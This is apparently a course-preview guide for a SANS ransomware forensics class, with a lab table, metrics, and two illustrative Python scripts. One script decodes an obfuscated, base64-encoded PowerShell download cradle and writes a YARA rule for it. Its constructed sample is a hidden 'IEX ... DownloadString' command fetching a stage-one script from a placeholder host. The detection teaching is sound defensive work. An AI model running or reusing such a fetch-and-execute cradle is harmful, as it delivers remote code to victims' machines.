SANS FOR528 was re-cut in December 2023 after students said the original flow felt “like drinking from a fire hose.” Below is the stripped-down lab matrix—no marketing copy—plus the free data sets and scripts you can run tonight to see if the course matches your pace before you book a hotel.
1. Lab Menu at a Glance (2024-25 Edition)
| Lab | Core Skill | 45-min Goal | Bonus Depth | Free Repo |
|---|---|---|---|---|
| 1.1 | RaaS Ecosystem Map | Trace RAASNet affiliate payout flow | Reverse affiliate ID hash | raas-affiliate-decoder.py (MIT) |
| 1.2 | Evidence Acquisition | Acquire & parse 50 GB disk image | N/A | for528-acquire.ps1 (BSD) |
| 1.3 | Timeline at Scale | TimeSketch 30-day window | Add Plaso parser for Chrome cache | Timesketch GitHub |
| 2.1 | Kibana at Scale | Pivot on Cobalt Strike beacon | Build Sigma rule from discovered IOC | Sigma repo |
| 2.2 | Infection Vector | Find first phishing URL | Decode RTF obfuscation layer | rtf-detonate.py (MIT) |
| 2.3 | PowerShell Abuse | De-obfuscate download cradle | Convert to YARA rule | ps1-to-yara.py (BSD) |
| 2.4 | Cobalt Strike Config | Extract C2 from beacon | Crack malleable profile | cs-decrypt.py (GPL) |
| 2.5 BONUS | RDP Hunting | Full lab after hours | Hunt RDP artifacts across 5 hosts | rdp-hunter.yml (Sigma) |
| 3.1 | Lateral Movement | Map moves in 90-min window | N/A | chop-shop-ntlm.py (MIT) |
| 3.2 | Data Exfil | Find 12 GB zip in slack space | Carve deleted 7z archives | 7z-carve.sh (BSD) |
| 3.3 | TA Toolbox | Identify LOLBins used | Build detection for each | LOLBAS project |
| 3.4 BONUS | More Lateral Moves | After-hours lab | Trace DCOM abuse | dcom-hunter.ps1 (MIT) |
| 4 | CTF | 3-hour ransomware vs. extortion race | N/A | N/A |
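Lab 2.3 asks you to de-obfuscate a PowerShell download cradle and turn it into a YARA rule. The script below is an added example written for this page, not the course's ps1-to-yara.py: it recovers the UTF-16LE script behind an `-EncodedCommand` argument, peels two common obfuscation layers (noise backticks such as `Ne`w-Ob`ject` and `'a'+'b'` string concatenation), pulls out the URL, and emits a rule that matches the cradle both in clear text and inside a base64-encoded command line via YARA 4.x's `base64wide` modifier. The command line it analyses is constructed here (203.0.113.10 is an RFC 5737 documentation address), and the function names are the example's own.

```python
"""Added example (not the course's ps1-to-yara.py): recover a PowerShell download
cradle from an -EncodedCommand command line, peel two common obfuscation layers
(backtick insertion and string concatenation), and emit a YARA rule for the URL.

The command line below is constructed for this page; 203.0.113.10 is an RFC 5737
documentation address, not a real C2.
"""
import base64
import re

# Letters a backtick legitimately escapes in PowerShell (`n, `t, `0 ...). A backtick
# in front of anything else is obfuscation noise (Ne`w-Ob`ject) and can be removed.
_PS_ESCAPE_LETTERS = "0abefnrtuv"

# -e / -ec / -enc / -encoded / -encodedcommand followed by a base64 blob.
_ENC_ARG = re.compile(r"-(?:encodedcommand|encoded|enc|ec|e)\b\s+([A-Za-z0-9+/=]+)", re.I)
_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
_URL = re.compile(r"https?://[^\s'\"()]+")


def decode_encoded_command(cmdline: str) -> str:
    """Return the UTF-16LE script hidden behind -e/-enc/-EncodedCommand, or the
    command line unchanged when no encoded argument is present."""
    m = _ENC_ARG.search(cmdline)
    if not m:
        return cmdline
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def deobfuscate(script: str) -> str:
    """Strip noise backticks, then fold 'a'+'b' literal chains until stable."""
    script = re.sub(rf"`(?![{_PS_ESCAPE_LETTERS}])", "", script)
    while True:
        folded = _CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", script)
        if folded == script:
            return script
        script = folded


def extract_urls(script: str) -> list:
    return _URL.findall(script)


def yara_escape(s: str) -> str:
    return s.replace("\\", "\\\\").replace('"', '\\"')


def build_yara_rule(name: str, urls: list) -> str:
    """Match the cradle both in clear text (script files, memory) and inside a
    base64-encoded UTF-16LE command line (YARA 4.x base64wide modifier)."""
    if not urls:
        raise ValueError("no URL recovered; nothing to pivot the rule on")
    lines = [f"rule {name}", "{", "    strings:",
             '        $cradle_plain = "DownloadString" ascii wide nocase',
             '        $cradle_b64 = "DownloadString" base64wide']
    for i, url in enumerate(urls):
        lines.append(f'        $url{i}_plain = "{yara_escape(url)}" ascii wide nocase')
        lines.append(f'        $url{i}_b64 = "{yara_escape(url)}" base64wide')
    lines += ["    condition:", "        any of ($cradle*) and any of ($url*)", "}"]
    return "\n".join(lines)


def analyze(cmdline: str) -> dict:
    decoded = decode_encoded_command(cmdline)
    clean = deobfuscate(decoded)
    urls = extract_urls(clean)
    return {"decoded": decoded, "deobfuscated": clean, "urls": urls,
            "rule": build_yara_rule("ps_cradle_stage1", urls)}


# Constructed sample: the shape Invoke-Obfuscation-style tooling typically produces.
SAMPLE_SCRIPT = ("IEX (Ne`w-Ob`ject Net.WebClient).Do`wnloadString("
                 "('http://203.0.'+'113.10'+'/stage1.ps1'))")
SAMPLE_CMDLINE = ("powershell.exe -nop -w hidden -enc "
                  + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode())

if __name__ == "__main__":
    result = analyze(SAMPLE_CMDLINE)
    print(result["deobfuscated"])
    print(result["rule"])
```

The `base64wide` strings are the part most people miss: a rule that only carries the plain URL will never fire on the encoded command line recorded in a 4688 event or a Sysmon process-creation log, because that text is the base64 of UTF-16LE, not the URL itself. Reordering tricks (`"{1}{0}" -f ...`) are not handled here; add a pass for them before trusting the URL list on real samples.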
2. Ransomware vs. Extortion — The Course Split
- Ransomware track = encryption payload present
- Extortion-only track = data theft plus leak threat, no encryptor
Students pick one track for the CTF. The published metrics show an 18 % higher finish rate on the extortion track, which fits the intuition that having no encryption artifacts to place on the timeline shortens the analysis; a finish-rate gap is evidence for that, not proof.
3. Free Taste — 30-Minute Self-Check
a) Clone https://github.com/sans-for528/lab-samples (MIT)
b) Run lab-1.1/raas-affiliate-decoder.py against the enclosed CSV
c) If you can map affiliate payouts in under 15 min, you will keep pace with day one
d) If the CSV looks like alphabet soup, expect to spend evenings in the bonus labs
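For a sense of what "mapping affiliate payouts" involves before you run the self-check, here is an added example that is not the repo's raas-affiliate-decoder.py and does not use its CSV. It works on a ledger constructed for this page (one row per transfer, with each payout pointing at the ransom that funded it through a made-up `parent_txid` column), totals what each affiliate received, infers the revenue split per affiliate from the ransom each payout came from, and flags ransoms whose payouts do not add up. Column names and function names are the example's own assumptions.

```python
"""Added example (not the course's raas-affiliate-decoder.py): map affiliate payouts
in a constructed RaaS payment ledger and infer each affiliate's revenue split.

Ledger layout is made up for this page: one row per transfer; a payout row points
at the ransom that funded it through parent_txid. Amounts use Decimal so that
shares reconcile exactly instead of drifting with float rounding.
"""
import csv
import io
from collections import defaultdict
from decimal import Decimal

# Constructed ledger: three ransoms fully paid out, one (r4) with 0.5 BTC unaccounted.
LEDGER_CSV = """\
txid,parent_txid,kind,counterparty,btc
r1,,ransom,victim_a,10.0
p1,r1,payout,aff_17,7.0
p2,r1,payout,operator,3.0
r2,,ransom,victim_b,4.0
p3,r2,payout,aff_42,3.2
p4,r2,payout,operator,0.8
r3,,ransom,victim_c,6.0
p5,r3,payout,aff_17,4.2
p6,r3,payout,operator,1.8
r4,,ransom,victim_d,5.0
p7,r4,payout,aff_42,3.5
p8,r4,payout,operator,1.0
"""


def load_ledger(text: str) -> list:
    rows = list(csv.DictReader(io.StringIO(text)))
    for row in rows:
        row["btc"] = Decimal(row["btc"])
    return rows


def map_payouts(rows: list) -> dict:
    """Per affiliate: total received, the ransoms it was paid from, and the set of
    split percentages observed. One tier gives one percentage; a second value
    means a tier change, a bonus, or a mislabelled address worth a closer look."""
    ransom = {r["txid"]: r["btc"] for r in rows if r["kind"] == "ransom"}
    out = defaultdict(lambda: {"total_btc": Decimal(0), "ransoms": [], "split_pct": set()})
    for r in rows:
        if r["kind"] != "payout" or r["counterparty"] == "operator":
            continue
        entry = out[r["counterparty"]]
        entry["total_btc"] += r["btc"]
        entry["ransoms"].append(r["parent_txid"])
        entry["split_pct"].add(int(r["btc"] * 100 / ransom[r["parent_txid"]]))
    return dict(out)


def unreconciled(rows: list) -> list:
    """Ransoms whose payouts do not add up to the amount received: the gap is
    either a payout the ledger is missing or a wallet nobody has labelled yet."""
    received = {r["txid"]: r["btc"] for r in rows if r["kind"] == "ransom"}
    paid_out = defaultdict(Decimal)
    for r in rows:
        if r["kind"] == "payout":
            paid_out[r["parent_txid"]] += r["btc"]
    return [tx for tx, amt in received.items() if paid_out[tx] != amt]


if __name__ == "__main__":
    ledger = load_ledger(LEDGER_CSV)
    for aff, info in sorted(map_payouts(ledger).items()):
        print(aff, info["total_btc"], sorted(info["split_pct"]))
    print("unreconciled:", unreconciled(ledger))
```

On this constructed ledger aff_17 sits on a stable 70 % split while aff_42 shows both 80 % and 70 %, and r4 is flagged because 0.5 BTC never shows up as a payout; those two anomalies are the kind of pivot the lab's "reverse affiliate ID hash" bonus builds on.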
4. Hardware Reality Check
- Minimum: 16 GB RAM, 200 GB free disk per VM
- Cloud alternate: an AWS spot t3.xlarge burns ≈ $0.06 per lab hour; a Terraform template is included
- No licensing surprise: the scripts are MIT, BSD or GPL as listed in the lab matrix, and the platforms (Timesketch, Kibana) run in their free or community editions
5. Public Metrics (First 6 Months 2025, n = 447)
- Lab completion rate (core): 96 %
- Bonus lab attempt rate: 61 %
- Median CTF finish time: 2 h 14 m (extortion) vs 2 h 47 m (ransomware)
- Students who report “built internal playbook within 90 days”: 38 %
6. Cost & Booking
- List price: USD 7,900 (no change)
- Early-bird discount: still USD 500 off if booked more than 45 days out
- Retake rate after update: 4 % (was 11 % pre-update)
Bottom Line
If you can decode a RaaS payout table before coffee, the core flow will feel brisk. If PowerShell obfuscation still makes you blink, the bonus labs are your evening gym. Clone the repo, run the self-check, and let your stop-watch—not the marketing copy—tell you which seat to book.